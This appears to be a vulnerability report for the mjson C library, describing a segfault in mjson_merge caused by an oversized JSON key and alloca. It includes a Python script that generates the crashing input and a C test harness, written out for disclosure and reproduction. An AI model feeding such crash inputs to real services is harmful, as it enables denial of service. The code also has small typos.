SEGV on unknown address has occurred in function mjson_merge at mjson.c:826

[Du4t]

Description

When reading in a larger key, it will cause alloca to allocate an incorrect memory address, resulting in SEGV

Version

commit 696969cd0d35399cc66075f5ec7a96e23ba4a89b (HEAD -> master, origin/master, origin/HEAD)
Author: novlean <novlean@gmail.com>
Date:   Wed Mar 5 18:00:56 2025 +0000

    Update README.md
    
    added mongoose

Steps to reproduce

$ git clone https://github.com/cesanta/mjson.git
$ cd msjon
$ python3 poc.py
$ clang -g -O0 harness.c ./src/mjson.c
$ ./harness

You can use the following Python script to generate PoC

import os

if __name__ == "__main__":
    with open("poc.json", "w") as f:
        f.write("{")
        f.write('"{}":1,'.format("A"*8388608))
        f.write("}")

The harness is as follows

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include "`src/mjson.h"


static int print_to_buffer(const char *buf, int len, void *userdata) {
  write(1, buf, len);
  return len;
}

int main() {
  char* s = malloc(2147483700);
  FILE* f = fopen("./poc.json", "r");
  fread(s, 2147483699, 1, f);
  const char *s2 = "{\"age\": 31, \"city\": \"New York\"}";
  
  char buffer[100];
  char *p = buffer;
  int bytes_written = mjson_merge(s, strlen(s), s2, strlen(s2), print_to_buffer, &p);

  return 0;
}